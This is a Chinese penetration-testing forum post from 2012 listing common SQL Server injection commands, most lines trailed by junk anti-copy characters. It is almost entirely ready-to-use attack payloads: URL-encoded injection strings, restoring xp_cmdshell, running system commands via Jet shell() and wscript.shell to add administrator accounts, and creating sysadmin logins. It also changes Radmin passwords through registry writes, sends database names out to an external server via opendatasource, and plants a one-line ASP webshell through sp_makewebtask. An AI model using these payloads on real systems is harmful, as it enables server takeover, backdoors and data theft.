中国网络渗透测试联盟

标题: 阿D常用的一些注入命令 [打印本页]
作者: admin    时间: 2012-9-13 17:26
标题: 阿D常用的一些注入命令
阿D常用的一些注入命令
/ B+ Z) A- T, L& K' Z# P//看看是什么权限的
+ x( b3 a7 i2 j5 t, s/ Gand 1=(Select IS_MEMBER('db_owner'))
$ o! T5 A, }. n& lAnd char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--. Z% k4 g! D) L( z4 V) j& D

, I5 W, u9 O7 ]9 v6 @//检测是否有读取某数据库的权限
' `0 \( b4 k( N8 p# k/ k/ tand 1= (Select HAS_DBACCESS('master')); y! p9 z; [4 K9 u& N
And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --
- ~- F) l0 Q/ Z* z$ o* f
# w* u; r, t$ b$ a9 B: q( t8 L  U
数字类型3 x8 V. P3 v0 Y8 I8 K  K1 Y3 R% l
and char(124)%2Buser%2Bchar(124)=0
+ `8 H1 r: q/ h6 ^2 r2 Y
( g% \* c( |" C) t+ u3 V  r字符类型
8 [9 Q; Z. M* t  Z- W/ ^; W$ _$ @' and char(124)%2Buser%2Bchar(124)=0 and ''='
* i0 P3 d) c2 N& i
$ m! T: }+ z8 [8 z搜索类型$ H8 |/ ^! b* d/ k! [
' and char(124)%2Buser%2Bchar(124)=0 and '%'=') K4 {- `# y: ]7 O

+ e5 \5 Q* H! h6 U6 ^爆用户名
" b4 n* b$ x  j2 o: e2 v# band user>0/ B. v2 P: d7 {& R3 ~
' and user>0 and ''='' j, t  y! w; ]
4 c9 ~0 r6 S, O% _( r2 w' B6 I3 ?1 ~
检测是否为SA权限
; v6 c0 t- R  b% [* W% l# V  h% Yand 1=(select IS_SRVROLEMEMBER('sysadmin'));--
" s$ p9 ], O( f0 mAnd char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --
, r3 ?$ e; ^( R( {6 j
% T( w: K3 g) C8 [) X0 J2 w检测是不是MSSQL数据库& a' g+ o8 f6 \# e- a
and exists (select * from sysobjects);-- 0 h" t% u/ s1 _- {$ j, r* h  B4 R% C

0 }( c2 E' Q+ o" v3 e检测是否支持多行
' u+ M' w' n! q5 l0 s# f% s9 g0 j- G/ c3 T;declare @d int;--
+ L7 Q& F! A3 }/ h, s* |
9 b' V# n, K5 i5 i  V恢复 xp_cmdshell
" p& J  M+ k; Y+ W3 {" Q. q;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--
) [; Q9 S+ X, k; s$ s5 c# i
  ?4 h5 q& V, [( \3 o0 Z* p! t8 ]6 h( ?4 s' R1 k
select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')   e4 A8 H3 ^! Y* j) W

+ u4 z3 t+ ]5 \0 S' e+ u% P  ~! U//-----------------------
- R% C7 Q/ u2 [//      执行命令9 Z" f7 A1 C% n+ B$ u
//-----------------------0 f) y+ m: o- `8 o: T7 i# Q% I
首先开启沙盘模式:
' Z& c! @/ Q9 r3 i; d* `' cexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',17 H3 C2 E5 \" c2 B' n, s! X& _- @% ?& r

4 D$ P" K# J% Z+ y, d5 H  w然后利用jet.oledb执行系统命令3 G: d$ L1 l  y/ `+ T7 W7 k0 J
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")'): n+ G$ Y- g0 @/ x5 K2 K

0 ]! D& b  `* g, w  n5 d1 s4 q执行命令
6 }% |* v1 g2 S" b0 E( M;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--% z5 A" n! e. \3 \) _2 [4 P+ v
& B4 x' j" I& x  m  W
EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'  a3 g1 r( Y2 q* D& {+ q1 I+ }: X* a

' }$ U& L# R5 e7 l判断xp_cmdshell扩展存储过程是否存在:: s8 W: k& f" n7 P' W
http://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')$ f. l! J/ Z! u" P7 S% c, S$ h
. q8 D& T1 _6 p9 j
写注册表. {+ z+ o+ I' _) Y6 J- V
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',13 Q  k+ \. j! a
% J) F: x7 Z" O* H
REG_SZ1 a0 L# Y; V$ l  T4 w0 ]* _- N

3 I" _# H  p( t; B2 h! K读注册表
% n/ D1 S& i) ?( `7 Y9 o. bexec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'! l& c! o; i! e3 {8 r6 h$ X

. _; p( ]  S! ~" v读取目录内容8 o+ p9 g! p$ z3 F: F; u& ?5 i
exec master..xp_dirtree 'c:\winnt\system32\',1,1" {4 A- S* {; o" ]; J

: x' m5 w3 C5 _& S; D1 b5 {! A; [9 E" _! u1 k# }$ w# f
数据库备份
7 S: z) s3 h3 l9 p9 N* mbackup database pubs to disk = 'c:\123.bak'
2 T! E# m# H/ g6 w/ F7 L& f# M' {
) I# |6 |" L* O, v//爆出长度
- q" B# {" u$ {& S' }) CAnd (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--
. _) [: M8 j6 c' C# b( u9 ^) u) a* m5 {% C$ K; x2 j$ _

" k- K3 N& V: V; Z9 l; v' i. k
) D! W. y0 ]( M( V更改sa口令方法:用sql综合利用工具连接后,执行命令:
! w0 Y7 K. a) d6 V" ]exec sp_password NULL,'新密码','sa'
8 G2 @3 v! o( Q$ y& j5 c5 i/ v  g! u6 _
添加和删除一个SA权限的用户test:
# _* m8 |0 F/ B  I: K7 ^: i4 M  Xexec master.dbo.sp_addlogin test,ptlove, L! U, E8 f7 ^9 @( l- N' ^
exec master.dbo.sp_addsrvrolemember test,sysadmin- k$ U6 U2 }0 N' b" |% A, l* \8 c

4 `* h/ f5 s+ q. m  C删除扩展存储过过程xp_cmdshell的语句: & J; K9 I/ B4 d. @! \2 ~
exec sp_dropextendedproc 'xp_cmdshell'' H' l. u) q* `, |

! }& K( t, F$ o7 t8 A. g* H8 b添加扩展存储过过程% {1 Y# p( C( n$ ^" z! }
EXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll' / Y; k7 p1 |# p9 x
GRANT exec On xp_proxiedadata TO public
8 R# B3 y3 k, y4 c
" g( {- z: K5 ^* O9 p) c
0 S0 c; y2 K5 `: ?- c: F停掉或激活某个服务。
0 T/ b# G, R8 P' X( b% Z; J* U( ^) _" Q$ [* d! z9 [
exec master..xp_servicecontrol 'stop','schedule'& g! ?5 U; {' a; l' y
exec master..xp_servicecontrol 'start','schedule'; S. V  G( Z  \; |9 x8 a3 t( Y
4 X+ @8 F% w' ~! G8 A, P
dbo.xp_subdirs
% u1 u3 {  N( m. s. K) x4 _6 b
! S! u+ P- d$ j& a只列某个目录下的子目录。
$ ?4 J5 z# C. }( c, d% L9 D# V! rxp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'
/ K6 y8 z! P9 |, i
0 c# W! J% V* |% _" Idbo.xp_makecab* s3 ?4 t8 N' i: V$ O

" X4 {1 s; l- ?/ @' I* @/ W将目标多个档案压缩到某个目标档案之内。4 G  ]9 d, O5 c* }3 [8 ]* }& m
所有要压缩的档案都可以接在参数列的最后方,以逗号隔开。
8 j' [1 G! r: R) I" P$ U- x- S; M0 c; K
, V! _( `8 T/ G" xdbo.xp_makecab  a/ d) u" s( [# o
'c:\test.cab','mszip',1,5 e5 U& I  o1 t; Z* b2 V. ~
'C:\Inetpub\wwwroot\SQLInject\login.asp',5 Z, B' D* r! H7 K7 S+ ~
'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'/ K" O+ K1 t. m/ B% r) y" K

8 ?* o9 e7 K! P7 ~- ~% xxp_terminate_process1 N& x2 ?$ [% n% X3 H9 z( y
: Z  q. T9 K( j9 N) H  Y- m% o
停掉某个执行中的程序,但赋予的参数是 Process ID。9 H8 [- W: N9 S/ K0 P6 y
利用”工作管理员”,透过选单「检视」-「选择字段」勾选 pid,就可以看到每个执行程序的 Process ID
& y4 C( _0 A) h$ a4 H) X6 L6 {1 o2 K" _; ]% m
xp_terminate_process 2484# u4 E3 `( D) {: Y+ V7 v! B3 X
( Q6 u' r3 S$ y
xp_unpackcab
' B' C* [2 p) E' E. |" K& u  S+ J* }
8 z2 s, l) H4 ~( ^解开压缩档。
8 |8 x4 z/ o9 K) g
( v/ x. W- k+ l& M- Qxp_unpackcab 'c:\test.cab','c:\temp',1: k- S% `7 h2 c2 W: ]& F2 d6 ?5 T

& B1 i! }, Q  R/ |4 V% x3 a. I4 L, x  Z( {$ |8 ~0 M
某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234; m" o+ k0 t- s* |8 k

+ l7 N0 k  M9 U# \: icreate database lcx;$ n: {$ V, r, v5 r! t- b$ Q; F3 m( ~
Create TABLE ku(name nvarchar(256) null);
$ |9 y7 M& x# A8 k) UCreate TABLE biao(id int NULL,name nvarchar(256) null);
! T' D# W! P, J/ B& Y5 I
/ q' c$ p! E8 q% g3 ^//得到数据库名/ j% @: D. Y# q9 S0 s
insert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases
& D8 b! O& J7 z2 n  n, O, H# Y* x# J) s0 x3 Z

9 @- v8 S! B7 J8 [/ b4 x) V, Q//在Master中创建表,看看权限怎样6 @/ f% J* x! c5 H  }6 t
Create TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--  J7 `8 [: P/ k) N1 |' f5 F) w

: R' s6 J' |7 t6 v用 sp_makewebtask直接在web目录里写入一句话马:" P! W6 }2 j6 ~
http://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--
4 a! j5 O& f0 o/ J& I4 }& i- a! X2 O+ \/ E8 [2 l2 A
//更新表内容
9 {: {1 z, }4 E) d& [Update films SET kind = 'Dramatic' Where id = 123
$ o* I2 E- V: H9 U( @, q4 W+ h0 Q1 p  I1 c
//删除内容9 T2 @8 F: I9 D, J4 L" S6 X) h  ?
delete from table_name where Stockid = 3



欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2